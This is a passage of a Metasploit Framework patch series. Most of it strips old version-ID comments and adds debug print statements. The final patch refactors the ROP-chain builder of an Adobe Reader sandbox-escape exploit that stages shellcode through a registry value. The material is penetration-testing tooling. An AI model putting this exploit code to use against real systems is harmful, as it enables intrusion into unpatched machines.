b/lib/msf/core/exploit/fmtstr.rb index 7de70ff6e9..39ea610dce 100644 --- a/lib/msf/core/exploit/fmtstr.rb +++ b/lib/msf/core/exploit/fmtstr.rb @@ -7,7 +7,6 @@ module Msf # in a more intelligent way. # # Author: jduck -# $Id$ ### module Exploit::FormatString diff --git a/lib/msf/core/exploit/ipv6.rb b/lib/msf/core/exploit/ipv6.rb index 7be24e6aec..d6f81faf8d 100644 --- a/lib/msf/core/exploit/ipv6.rb +++ b/lib/msf/core/exploit/ipv6.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb index 709457ffa0..431488690d 100644 --- a/lib/msf/core/exploit/mixins.rb +++ b/lib/msf/core/exploit/mixins.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ # # All exploit mixins should be added to the list below # diff --git a/lib/msf/core/exploit/mysql.rb b/lib/msf/core/exploit/mysql.rb index b86e51e9a9..e8dd2ac0bf 100644 --- a/lib/msf/core/exploit/mysql.rb +++ b/lib/msf/core/exploit/mysql.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## ## # This file is part of the Metasploit Framework and may be subject to diff --git a/lib/msf/core/exploit/omelet.rb b/lib/msf/core/exploit/omelet.rb index 41d7905fd4..e5945812a6 100644 --- a/lib/msf/core/exploit/omelet.rb +++ b/lib/msf/core/exploit/omelet.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/exploitation/omelet' diff --git a/lib/msf/core/exploit/pdf.rb b/lib/msf/core/exploit/pdf.rb index 630d8dc579..9f3c4777d6 100644 --- a/lib/msf/core/exploit/pdf.rb +++ b/lib/msf/core/exploit/pdf.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## ### # diff --git a/lib/msf/core/exploit/php_exe.rb b/lib/msf/core/exploit/php_exe.rb index 3c59f568ed..0a768a436e 100644 --- a/lib/msf/core/exploit/php_exe.rb +++ b/lib/msf/core/exploit/php_exe.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## ### # diff --git a/lib/msf/core/exploit/riff.rb b/lib/msf/core/exploit/riff.rb index 3681c0f2bf..57b7b167af 100644 --- a/lib/msf/core/exploit/riff.rb +++ b/lib/msf/core/exploit/riff.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf diff --git a/lib/msf/core/exploit/tcp.rb b/lib/msf/core/exploit/tcp.rb index 5a923427ec..a34f195744 100644 --- a/lib/msf/core/exploit/tcp.rb +++ b/lib/msf/core/exploit/tcp.rb @@ -468,6 +468,8 @@ module Exploit::Remote::TcpServer # def regenerate_payload(cli, arch = nil, platform = nil, target = nil) + $stderr.puts("Tcp##{__method__} : target: #{target.inspect}") + ohost = datastore['RHOST'] oport = datastore['RPORT'] p = nil @@ -477,7 +479,7 @@ module Exploit::Remote::TcpServer datastore['RHOST'] = cli.peerhost datastore['RPORT'] = cli.peerport - if ((p = super(arch, platform, target)) == nil) + if ((p = super(platform, arch, target)) == nil) print_error("Failed to generate payload") return nil end diff --git a/lib/msf/core/exploit/telnet.rb b/lib/msf/core/exploit/telnet.rb index 8a7655055f..ba0b65bf24 100644 --- a/lib/msf/core/exploit/telnet.rb +++ b/lib/msf/core/exploit/telnet.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf diff --git a/lib/msf/core/exploit/tftp.rb b/lib/msf/core/exploit/tftp.rb index c20250f5d8..a75ab290f4 100644 --- a/lib/msf/core/exploit/tftp.rb +++ b/lib/msf/core/exploit/tftp.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/proto/tftp' diff --git a/lib/msf/core/exploit/wbemexec.rb b/lib/msf/core/exploit/wbemexec.rb index 660d29f45d..a8e8e89d01 100644 --- a/lib/msf/core/exploit/wbemexec.rb +++ b/lib/msf/core/exploit/wbemexec.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## # # This mixin enables executing arbitrary commands via the diff --git a/lib/msf/core/payload/generic.rb b/lib/msf/core/payload/generic.rb index c72cf13bf0..4691c7ed59 100644 --- a/lib/msf/core/payload/generic.rb +++ b/lib/msf/core/payload/generic.rb @@ -211,10 +211,13 @@ protected arch = nil if explicit_arch.nil? == false + $stderr.puts "explicit" arch = explicit_arch elsif datastore['ARCH'] + $stderr.puts "datastore" arch = datastore['ARCH'] elsif assoc_exploit + $stderr.puts "assoc_exploit" arch = assoc_exploit.target_arch || ARCH_X86 end @@ -233,6 +236,8 @@ protected # Look for one based on the exploit's compatible set if(assoc_exploit) + $stderr.puts "assoc_exploit #{assoc_exploit.name}" + $stderr.puts "#{actual_arch} #{actual_platform.inspect}" self.actual_payload = framework.payloads.find_payload_from_set( assoc_exploit.compatible_payloads, actual_platform, diff --git a/lib/msf/core/payload/windows/exec.rb b/lib/msf/core/payload/windows/exec.rb index 5ad8a42568..5e3f9b510a 100644 --- a/lib/msf/core/payload/windows/exec.rb +++ b/lib/msf/core/payload/windows/exec.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf diff --git a/lib/msf/core/payload/windows/loadlibrary.rb b/lib/msf/core/payload/windows/loadlibrary.rb index 05854d12df..dc128e3d18 100644 --- a/lib/msf/core/payload/windows/loadlibrary.rb +++ b/lib/msf/core/payload/windows/loadlibrary.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf diff --git a/lib/msf/core/rpc/v10/rpc_module.rb b/lib/msf/core/rpc/v10/rpc_module.rb index 0a112be7f7..f831730fe1 100644 --- a/lib/msf/core/rpc/v10/rpc_module.rb +++ b/lib/msf/core/rpc/v10/rpc_module.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id: module.rb 12624 2011-05-15 23:51:53Z hdm $ -## module Msf module RPC diff --git a/lib/msf/ui/console/command_dispatcher/payload.rb b/lib/msf/ui/console/command_dispatcher/payload.rb index 8b6a248384..65a41f1650 100644 --- a/lib/msf/ui/console/command_dispatcher/payload.rb +++ b/lib/msf/ui/console/command_dispatcher/payload.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/parser/arguments' diff --git a/lib/msf/windows_error.rb b/lib/msf/windows_error.rb index 94053f8e52..42c2d175fa 100644 --- a/lib/msf/windows_error.rb +++ b/lib/msf/windows_error.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## # # Windows system error codes (0-499) diff --git a/lib/rex/elfparsey.rb b/lib/rex/elfparsey.rb index a9f891066a..abe5e626ee 100644 --- a/lib/rex/elfparsey.rb +++ b/lib/rex/elfparsey.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module ElfParsey diff --git a/lib/rex/elfparsey/elf.rb b/lib/rex/elfparsey/elf.rb index 9d9811f6d5..33061fe6e4 100644 --- a/lib/rex/elfparsey/elf.rb +++ b/lib/rex/elfparsey/elf.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/elfparsey/elfbase' require 'rex/elfparsey/exceptions' require 'rex/image_source' diff --git a/lib/rex/elfparsey/elfbase.rb b/lib/rex/elfparsey/elfbase.rb index be5691e2d8..d91ba7aee1 100644 --- a/lib/rex/elfparsey/elfbase.rb +++ b/lib/rex/elfparsey/elfbase.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/struct2' module Rex diff --git a/lib/rex/elfparsey/exceptions.rb b/lib/rex/elfparsey/exceptions.rb index 4e3804424f..5437246afe 100644 --- a/lib/rex/elfparsey/exceptions.rb +++ b/lib/rex/elfparsey/exceptions.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module ElfParsey diff --git a/lib/rex/elfscan.rb b/lib/rex/elfscan.rb index d3e66affbc..38c9706690 100644 --- a/lib/rex/elfscan.rb +++ b/lib/rex/elfscan.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module ElfScan diff --git a/lib/rex/elfscan/scanner.rb b/lib/rex/elfscan/scanner.rb index 115aa0977d..244ee7e728 100644 --- a/lib/rex/elfscan/scanner.rb +++ b/lib/rex/elfscan/scanner.rb @@ -1,7 +1,5 @@ # -*- coding: binary -*- -# $Id$ - module Rex module ElfScan module Scanner diff --git a/lib/rex/elfscan/search.rb b/lib/rex/elfscan/search.rb index 80f7be017c..cb0e9292f1 100644 --- a/lib/rex/elfscan/search.rb +++ b/lib/rex/elfscan/search.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module ElfScan module Search diff --git a/lib/rex/exploitation/cmdstager/tftp.rb b/lib/rex/exploitation/cmdstager/tftp.rb index 3607fb4ea7..e646e291f1 100644 --- a/lib/rex/exploitation/cmdstager/tftp.rb +++ b/lib/rex/exploitation/cmdstager/tftp.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/text' require 'rex/arch' diff --git a/lib/rex/exploitation/jsobfu.rb b/lib/rex/exploitation/jsobfu.rb index 2c8d51299a..32bc87f640 100644 --- a/lib/rex/exploitation/jsobfu.rb +++ b/lib/rex/exploitation/jsobfu.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/text' require 'rkelly' diff --git a/lib/rex/image_source.rb b/lib/rex/image_source.rb index 1cf4a94a8d..f7f3ff1c44 100644 --- a/lib/rex/image_source.rb +++ b/lib/rex/image_source.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module ImageSource diff --git a/lib/rex/image_source/disk.rb b/lib/rex/image_source/disk.rb index 0b3f5faa83..f37b7be47f 100644 --- a/lib/rex/image_source/disk.rb +++ b/lib/rex/image_source/disk.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/image_source/image_source' require 'rex/struct2' diff --git a/lib/rex/image_source/image_source.rb b/lib/rex/image_source/image_source.rb index 549388fc4e..4d6e428e06 100644 --- a/lib/rex/image_source/image_source.rb +++ b/lib/rex/image_source/image_source.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module ImageSource class ImageSource diff --git a/lib/rex/image_source/memory.rb b/lib/rex/image_source/memory.rb index c75be1881f..3f27990324 100644 --- a/lib/rex/image_source/memory.rb +++ b/lib/rex/image_source/memory.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/image_source/image_source' require 'rex/struct2' diff --git a/lib/rex/ole.rb b/lib/rex/ole.rb index d2a0407134..38f6f4924a 100644 --- a/lib/rex/ole.rb +++ b/lib/rex/ole.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/clsid.rb b/lib/rex/ole/clsid.rb index e697dd121d..b6458c903e 100644 --- a/lib/rex/ole/clsid.rb +++ b/lib/rex/ole/clsid.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/difat.rb b/lib/rex/ole/difat.rb index 52ab121b4c..825a1089b4 100644 --- a/lib/rex/ole/difat.rb +++ b/lib/rex/ole/difat.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/directory.rb b/lib/rex/ole/directory.rb index 4b91038686..464a073ebd 100644 --- a/lib/rex/ole/directory.rb +++ b/lib/rex/ole/directory.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/direntry.rb b/lib/rex/ole/direntry.rb index c6f634691a..a546a6e32b 100644 --- a/lib/rex/ole/direntry.rb +++ b/lib/rex/ole/direntry.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/fat.rb b/lib/rex/ole/fat.rb index 2edb3de8ac..0adc2aa30d 100644 --- a/lib/rex/ole/fat.rb +++ b/lib/rex/ole/fat.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/header.rb b/lib/rex/ole/header.rb index b24eef4e31..a6341e7636 100644 --- a/lib/rex/ole/header.rb +++ b/lib/rex/ole/header.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/minifat.rb b/lib/rex/ole/minifat.rb index 1e9bbdb0e3..df2b073582 100644 --- a/lib/rex/ole/minifat.rb +++ b/lib/rex/ole/minifat.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/propset.rb b/lib/rex/ole/propset.rb index 8a1812d96c..f5c94a602a 100644 --- a/lib/rex/ole/propset.rb +++ b/lib/rex/ole/propset.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/storage.rb b/lib/rex/ole/storage.rb index 55f6259a60..fc6a15797a 100644 --- a/lib/rex/ole/storage.rb +++ b/lib/rex/ole/storage.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/stream.rb b/lib/rex/ole/stream.rb index fd7e36d050..8d2ea7f3d5 100644 --- a/lib/rex/ole/stream.rb +++ b/lib/rex/ole/stream.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/substorage.rb b/lib/rex/ole/substorage.rb index 1e14440853..b60a8714fb 100644 --- a/lib/rex/ole/substorage.rb +++ b/lib/rex/ole/substorage.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/util.rb b/lib/rex/ole/util.rb index 5712e598c8..90da72d3c9 100644 --- a/lib/rex/ole/util.rb +++ b/lib/rex/ole/util.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/peparsey.rb b/lib/rex/peparsey.rb index 6e6addffe7..22916826fd 100644 --- a/lib/rex/peparsey.rb +++ b/lib/rex/peparsey.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module PeParsey diff --git a/lib/rex/peparsey/exceptions.rb b/lib/rex/peparsey/exceptions.rb index 45951f8322..359b2807fd 100644 --- a/lib/rex/peparsey/exceptions.rb +++ b/lib/rex/peparsey/exceptions.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module PeParsey diff --git a/lib/rex/peparsey/pe.rb b/lib/rex/peparsey/pe.rb index 3966e06f0b..de895159e3 100644 --- a/lib/rex/peparsey/pe.rb +++ b/lib/rex/peparsey/pe.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/image_source' require 'rex/peparsey/exceptions' require 'rex/peparsey/pebase' diff --git a/lib/rex/peparsey/pe_memdump.rb b/lib/rex/peparsey/pe_memdump.rb index 85f118f8c7..eef2ab7a53 100644 --- a/lib/rex/peparsey/pe_memdump.rb +++ b/lib/rex/peparsey/pe_memdump.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/image_source' require 'rex/peparsey/exceptions' require 'rex/peparsey/pebase' diff --git a/lib/rex/peparsey/pebase.rb b/lib/rex/peparsey/pebase.rb index bf268e6b36..5a3e5247b9 100644 --- a/lib/rex/peparsey/pebase.rb +++ b/lib/rex/peparsey/pebase.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/peparsey/exceptions' require 'rex/struct2' diff --git a/lib/rex/peparsey/section.rb b/lib/rex/peparsey/section.rb index 392b42f067..8110cc071e 100644 --- a/lib/rex/peparsey/section.rb +++ b/lib/rex/peparsey/section.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/peparsey/exceptions' require 'rex/peparsey/pebase' require 'rex/struct2' diff --git a/lib/rex/pescan.rb b/lib/rex/pescan.rb index 163c6f0db5..9483abc15f 100644 --- a/lib/rex/pescan.rb +++ b/lib/rex/pescan.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module PeScan diff --git a/lib/rex/proto/dhcp.rb b/lib/rex/proto/dhcp.rb index 9a8a036f84..d28ae0bf8b 100644 --- a/lib/rex/proto/dhcp.rb +++ b/lib/rex/proto/dhcp.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ # # DHCP Server support written by scriptjunkie # diff --git a/lib/rex/proto/dhcp/constants.rb b/lib/rex/proto/dhcp/constants.rb index c99d74f1bc..96e2829691 100644 --- a/lib/rex/proto/dhcp/constants.rb +++ b/lib/rex/proto/dhcp/constants.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/proto/dhcp' module Rex diff --git a/lib/rex/proto/dhcp/server.rb b/lib/rex/proto/dhcp/server.rb index abfd39d2d0..1dccbc0c09 100644 --- a/lib/rex/proto/dhcp/server.rb +++ b/lib/rex/proto/dhcp/server.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/socket' require 'rex/proto/dhcp' diff --git a/lib/rex/proto/ntlm/crypt.rb b/lib/rex/proto/ntlm/crypt.rb index f7a99efcfb..3885f29b85 100644 --- a/lib/rex/proto/ntlm/crypt.rb +++ b/lib/rex/proto/ntlm/crypt.rb @@ -43,10 +43,6 @@ # The latter has a minor bug in its separate_keys function. # The third key has to begin from the 14th character of the # input string instead of 13th:) -#-- -# $Id: ntlm.rb 11678 2011-01-30 19:26:35Z hdm $ -#++ - require 'rex/proto/ntlm/constants' require 'rex/proto/ntlm/base' diff --git a/lib/rex/proto/ntlm/message.rb b/lib/rex/proto/ntlm/message.rb index a8c678e877..efe5f7ec4d 100644 --- a/lib/rex/proto/ntlm/message.rb +++ b/lib/rex/proto/ntlm/message.rb @@ -40,9 +40,6 @@ # The latter has a minor bug in its separate_keys function. # The third key has to begin from the 14th character of the # input string instead of 13th:) -#-- -# $Id: ntlm.rb 11678 2011-01-30 19:26:35Z hdm $ -#++ #this module defines the message class , useful for easily handling type 1/2/3 ntlm messages diff --git a/lib/rex/proto/rfb.rb b/lib/rex/proto/rfb.rb index 378bc1428b..623f780b29 100644 --- a/lib/rex/proto/rfb.rb +++ b/lib/rex/proto/rfb.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id: $ # # RFB protocol support # diff --git a/lib/rex/proto/rfb.rb.ut.rb b/lib/rex/proto/rfb.rb.ut.rb index d06de6c4d2..cb9900de64 100644 --- a/lib/rex/proto/rfb.rb.ut.rb +++ b/lib/rex/proto/rfb.rb.ut.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- # -# $Id: $ -# # RFB protocol support # # @author Joshua J. Drake diff --git a/lib/rex/proto/rfb/cipher.rb b/lib/rex/proto/rfb/cipher.rb index 7a0c37dbdb..ca54d19a2e 100644 --- a/lib/rex/proto/rfb/cipher.rb +++ b/lib/rex/proto/rfb/cipher.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id: $ -## ## # diff --git a/lib/rex/proto/rfb/client.rb b/lib/rex/proto/rfb/client.rb index 723a067034..fd75160953 100644 --- a/lib/rex/proto/rfb/client.rb +++ b/lib/rex/proto/rfb/client.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id: $ -## ## # diff --git a/lib/rex/proto/rfb/constants.rb b/lib/rex/proto/rfb/constants.rb index fc5517d8a3..868b6533f1 100644 --- a/lib/rex/proto/rfb/constants.rb +++ b/lib/rex/proto/rfb/constants.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id: $ -## ## # diff --git a/lib/rex/proto/tftp.rb b/lib/rex/proto/tftp.rb index 2ed08237e4..22e93f8bf7 100644 --- a/lib/rex/proto/tftp.rb +++ b/lib/rex/proto/tftp.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ # # TFTP Server implementation according to: # diff --git a/lib/rex/proto/tftp/constants.rb b/lib/rex/proto/tftp/constants.rb index d29894c8bf..476000afe4 100644 --- a/lib/rex/proto/tftp/constants.rb +++ b/lib/rex/proto/tftp/constants.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/proto/tftp' module Rex diff --git a/lib/rex/proto/tftp/server.rb b/lib/rex/proto/tftp/server.rb index c01d18f9a9..7c9e3bee3a 100644 --- a/lib/rex/proto/tftp/server.rb +++ b/lib/rex/proto/tftp/server.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/socket' require 'rex/proto/tftp' diff --git a/lib/rex/proto/tftp/server.rb.ut.rb b/lib/rex/proto/tftp/server.rb.ut.rb index b767e0c2e4..32a0647518 100755 --- a/lib/rex/proto/tftp/server.rb.ut.rb +++ b/lib/rex/proto/tftp/server.rb.ut.rb @@ -1,10 +1,5 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# -# $Revision$ -# -# $Id$ -# require 'rex/compat' require 'rex/proto/tftp' diff --git a/lib/rex/zip/archive.rb b/lib/rex/zip/archive.rb index 0c69769aee..b8b068f75f 100644 --- a/lib/rex/zip/archive.rb +++ b/lib/rex/zip/archive.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Rex module Zip diff --git a/lib/rex/zip/blocks.rb b/lib/rex/zip/blocks.rb index 6774e73869..d589b99318 100644 --- a/lib/rex/zip/blocks.rb +++ b/lib/rex/zip/blocks.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Rex module Zip diff --git a/lib/rex/zip/entry.rb b/lib/rex/zip/entry.rb index ff41196550..b063b6a72e 100644 --- a/lib/rex/zip/entry.rb +++ b/lib/rex/zip/entry.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Rex module Zip diff --git a/modules/auxiliary/server/capture/drda.rb b/modules/auxiliary/server/capture/drda.rb index 2072b8545b..f77fe8c5af 100644 --- a/modules/auxiliary/server/capture/drda.rb +++ b/modules/auxiliary/server/capture/drda.rb @@ -1,6 +1,4 @@ -## -# $Id: drda.rb 14774 2012-02-21 01:42:17Z rapid7 $ -## +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb index b3c33e892f..f98eed8595 100644 --- a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb +++ b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb @@ -1,6 +1,4 @@ -## -# $Id: $ -## +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb b/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb index 11b5d57c76..6900ed129a 100644 --- a/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb +++ b/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb @@ -1,6 +1,4 @@ -## -# $Id: $ -## +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb index 422b8f8392..ae8b61a428 100644 --- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb +++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb @@ -1,6 +1,4 @@ -## -# $Id: jboss_deploymentfilerepository.rb 15620 2012-07-12 07:33:06Z rapid7 $ -## +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb index bec17f874b..ea8fcce859 100644 --- a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb +++ b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb @@ -1,6 +1,4 @@ -## -# $Id: novelliprint_getdriversettings.rb$ -## +# -*- coding: binary -*- ### # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb index e0715c8038..f91f26f1e1 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb @@ -1,6 +1,4 @@ -## -# $Id: $ -## +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/post/windows/gather/credentials/imvu.rb b/modules/post/windows/gather/credentials/imvu.rb index 745e30410b..2129a721a6 100644 --- a/modules/post/windows/gather/credentials/imvu.rb +++ b/modules/post/windows/gather/credentials/imvu.rb @@ -1,6 +1,4 @@ -## -# $Id: enum_imvu.rb 14100 2011-10-28 18:00:10Z theLightCosine $ -## +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/post/windows/gather/credentials/outlook.rb b/modules/post/windows/gather/credentials/outlook.rb index f9bf10b3e3..38c25e3895 100644 --- a/modules/post/windows/gather/credentials/outlook.rb +++ b/modules/post/windows/gather/credentials/outlook.rb @@ -1,4 +1,4 @@ -# $Id: outlook.rb 14835 2012-03-01 22:15:05Z rapid7 $ +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/post/windows/recon/resolve_ip.rb b/modules/post/windows/recon/resolve_ip.rb index f4e761de39..36722018f0 100644 --- a/modules/post/windows/recon/resolve_ip.rb +++ b/modules/post/windows/recon/resolve_ip.rb @@ -1,6 +1,4 @@ -## -# $Id $ -## +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to From 53cb493bc96a6a0b5b086ddc6b8244178fcfb6d6 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 20 May 2013 18:44:21 -0500 Subject: [PATCH 4/6] Fix @jlee-r7's feedback --- .../local/adobe_sandbox_adobecollabsync.rb | 41 ++++++++----------- 1 file changed, 18 insertions(+), 23 deletions(-) diff --git a/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb index de33098531..50a7c3ad46 100644 --- a/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb +++ b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb @@ -185,6 +185,19 @@ class Metasploit3 < Msf::Exploit::Local vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop ecx # ret'].to_s(16)}") end + def store(buf, data, address) + i = 0 + while (i < data.length) + buf << [@gadgets['pop edi # ret']].pack("V") + buf << [address + i].pack("V") # edi + buf << [@gadgets['pop ecx # ret']].pack("V") + buf << data[i, 4].ljust(4,"\x00") # ecx + buf << [@gadgets['mov [edi], ecx # ret']].pack("V") + i = i + 4 + end + return i + end + def create_rop_chain mem = 0x0c0c0c0c @@ -210,31 +223,13 @@ class Metasploit3 < Msf::Exploit::Local # Put in the allocated memory the necessary data in order to read the # shellcode stored in the registry - # The reg sub key: Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions - # The reg entry: shellcode - # The output buffer size: 0x3000 + # 1) The reg sub key: Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions reg_key = "Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\x00" - j = 0 - while (j < reg_key.length) - buf << [@gadgets['pop edi # ret']].pack("V") - buf << [mem + j].pack("V") # edi - buf << [@gadgets['pop ecx # ret']].pack("V") - buf << reg_key[j, 4].ljust(4,"\x00") # ecx - buf << [@gadgets['mov [edi], ecx # ret']].pack("V") - j = j + 4 - end - k = j + reg_key_length = store(buf, reg_key, mem) + # 2) The reg entry: shellcode value_key = "shellcode\x00" - j = 0 - while (j < value_key.length) - buf << [@gadgets['pop edi # ret']].pack("V") - buf << [mem + k + j].pack("V") # edi - buf << [@gadgets['pop ecx # ret']].pack("V") - buf << value_key[j, 4].ljust(4,"\x00") # ecx - buf << [@gadgets['mov [edi], ecx # ret']].pack("V") - j = j + 4 - end - + store(buf, value_key, mem + reg_key_length) + # 3) The output buffer size: 0x3000 size_buffer = 0x3000 buf << [@gadgets['pop edi # ret']].pack("V") buf << [mem + 0x50].pack("V") # edi From 